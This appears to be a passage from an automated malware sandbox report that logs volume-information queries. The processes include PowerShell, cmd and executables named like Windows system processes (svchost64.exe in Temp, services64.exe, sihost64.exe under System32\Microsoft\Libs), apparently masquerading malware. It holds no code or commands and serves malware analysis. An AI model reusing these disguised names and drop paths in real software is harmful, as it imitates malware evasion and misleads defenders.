Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\services64.exe	Queries volume information: C:\Windows\System32\services64.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\services64.exe	Queries volume information: C:\Windows\System32\services64.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\svchost64.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe	Queries volume information: C:\Windows\System32\Microsoft\Libs\sihost64.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
